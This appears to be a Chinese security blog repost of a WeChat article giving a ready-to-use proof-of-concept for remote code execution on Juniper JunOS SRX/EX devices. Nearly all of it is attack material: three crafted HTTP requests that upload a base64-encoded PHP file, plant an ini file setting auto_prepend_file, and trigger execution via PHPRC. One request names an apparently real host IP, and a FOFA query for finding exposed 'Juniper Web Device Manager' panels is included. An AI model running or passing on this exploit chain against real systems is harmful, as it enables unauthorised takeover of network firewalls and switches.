2023年10月13日23:12:55评论36 views字数 3307阅读11分1秒阅读模式

免责声明

该公众号主要是分享互联网上公开的一些漏洞poc和工具，利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如果本公众号分享导致的侵权行为请告知，我们会立即删除并道歉。

Juniper JunOS SRX EX 远程命令执行漏洞

漏洞影响范围

Juniper JunOS SRX EX 远程命令执行漏洞

漏洞复现

构造poc

将poc base64编码<?php echo 123;?> PD9waHAgZWNobyAxMjM7Pz4=并计算字符串长度：17
构造payload：rs=do_upload&rsargs%5B0%5D=[{"fileData":"data:text/html;base64,PD9waHAgZWNobyAxMjM7Pz4=","fileName":"test.php","csize":17}

2.发送请求数据包获取

POST /webauth_operation.php HTTP/1.1Host: Cache-Control: max-age=0Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 123
rs=do_upload&rsargs%5B0%5D=[{"fileData":"data:text/html;base64,PD9waHAgZWNobyAxMjM7Pz4=","fileName":"test.php","csize":17}]

出现如下数据代表漏洞存在

Juniper JunOS SRX EX 远程命令执行漏洞

3.构造第二个请求数据包

获取上个返回数据包的文件名：b27264a90cfee371812c2888cf09d560c99dbbaaca652a6d270b49dffc7b05c0.php拼接路径：auto_prepend_file="/var/tmp/b27264a90cfee371812c2888cf09d560c99dbbaaca652a6d270b49dffc7b05c0.php"进行base64编码：YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wL2IyNzI2NGE5MGNmZWUzNzE4MTJjMjg4OGNmMDlkNTYwYzk5ZGJiYWFjYTY1MmE2ZDI3MGI0OWRmZmM3YjA1YzAucGhwIg==
构造payload：rs=do_upload&rsargs[0]=[{"fileData":"data:plain/text;base64,YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wL2IyNzI2NGE5MGNmZWUzNzE4MTJjMjg4OGNmMDlkNTYwYzk5ZGJiYWFjYTY1MmE2ZDI3MGI0OWRmZmM3YjA1YzAucGhwIg==","fileName":"test.ini","csize":97}]

4.发送请求

POST /webauth_operation.php HTTP/1.1Host:4.227.247.131Cache-Control: max-age=0Sec-Ch-Ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 228
rs=do_upload&rsargs[0]=[{"fileData":"data:plain/text;base64,YXV0b19wcmVwZW5kX2ZpbGU9Ii92YXIvdG1wL2IyNzI2NGE5MGNmZWUzNzE4MTJjMjg4OGNmMDlkNTYwYzk5ZGJiYWFjYTY1MmE2ZDI3MGI0OWRmZmM3YjA1YzAucGhwIg==","fileName":"test.ini","csize":97}]

出现如下数据代表漏洞存在

Juniper JunOS SRX EX 远程命令执行漏洞

5.构造第三个数据包触发代码执行

GET /webauth_operation.php?PHPRC=/var/tmp/0a08e12bcfa86cdafc2eb73c5ebd31b5701786458a7efa2c43187408f6afaca5.ini{上一个数据包的文件名} HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close

Juniper JunOS SRX EX 远程命令执行漏洞

搜索语法

fofa：title=="Juniper Web Device Manager"

原文始发于微信公众号（小白菜安全）：Juniper JunOS SRX EX 远程命令执行漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

Juniper JunOS SRX EX 远程命令执行漏洞

漏洞复现

4.发送请求

5.构造第三个数据包触发代码执行

搜索语法

MajorDoMo 未授权RCE漏洞

QVD-2024-15263禅道项目管理系统身份认证绕过

某直辖市HW三甲医院公众号越权漏洞泄露8W+个人信息

禅道项目管理系统身份认证绕过

Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞

CVE-2024-24488

用友NC grouptemplet 任意文件上传漏洞

瑞友天翼虚拟化系统-SQL注入-ConsoleExternalApi

用友一波POC/EXP

禅道 zentaosid 身份认证绕过漏洞

发表评论

在线咨询

微信